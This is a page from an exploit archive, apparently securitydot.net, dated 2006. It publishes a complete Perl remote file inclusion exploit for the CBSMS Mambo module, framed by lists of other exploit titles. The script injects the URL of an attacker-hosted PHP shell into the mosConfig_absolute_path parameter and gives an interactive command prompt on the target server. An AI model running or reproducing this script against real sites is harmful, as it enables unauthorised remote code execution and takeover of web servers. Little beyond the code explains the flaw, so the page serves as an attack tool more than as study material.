exploits , vulnerabilities , articles , CBSMS Mambo Module <= 1.0 ([mosConfig_absolute

2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-12 Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability
2007-04-12 Mambo Module Weather (absolute_path) RFI Vulnerability
2007-04-12 TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities
2007-04-11 Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

2006-07-17

CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion Exploit

Rated as : Moderated Risk
#!/usr/bin/perl
############
# CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path]) Remote File
Include Exploit
# Exploit :hadihadi_zedehal_2006&a.nosrati
#
# example:#  perl CB.pl <host> <cmd-shell> <cmd>
#   perl CB.pl http://target.com/[PATCH]/ http://yorshell.com/cmd.php cmd
#
#
# securitydot.net
#
#
# greetz:hadi_aryaie2004&ahmad_virangar2004&mahtab_e66&all virangar
members
############
# Contact:  info@virangar.net hadihadi_zedehal_2006@yahoo.com
############
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
head();
while() {
 print "[shell] \$";
 while(<STDIN>)      {
  $cmd=$_;
  chomp($cmd);
  if (!$cmd) {last;} 
  $xpl = LWP::UserAgent->new() or die;
  $req = HTTP::Request->new(GET
=>$Path.'mod_cbsms_messages.php?mosConfig_absolute_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";
  $res = $xpl->request($req);
  $return = $res->content;
  $return =~ tr/[\n]/[ê]/;
  if ($return =~/Error: HTTP request failed!/ ) {
   print "\nInvalid path for phpshell\n";
   exit;
  } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
   print "\nInvalid Command, error.\n\n";
  }
  if ($return =~ /(.*)/) {
   $finreturn = $1;
   $finreturn=~ tr/[ê]/[\n]/;
   print "\r\n$finreturn\n\r";
   last;
  } else {
   print "[shell] \$";
  }
 }
} last;
sub head()  {
 print
"\n=========================================================================================\r\n";
 print "  CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path])
Remote File Include Exploit\r\n";
 print
"===========================================================================================\r\n";
 }
 
sub usage() {
 head();
 print " Usage: perl CB.pl <host> <YOURSHELL>
<CMD>\r\n\n";
 print " <host> - Full Path :  http://target.com/[PATCH]/
\r\n";
 print " <YOURSHELL> - PhpShell :
http://YOURSHELL.COM/shell.PHP \r\n";
 print " <CMD> - YOUR COMMAND \r\n\r\n";
print
"============================================================================\r\n";
 print "                   coded by hadihadi_zedehal_2006&a.nosrati
\r\n";
 print "                    www.virangar.net*www.virangar.org
\r\n";
 print
"============================================================================\r\n";
 
exit();
 }
securitydot.net - 2006-07-17

Exploits - newest 10 RSS | More

2007-06-15 56902 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33966 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42113 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29182 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19606 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16581 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19251 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16443 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33424 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17106 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion Exploit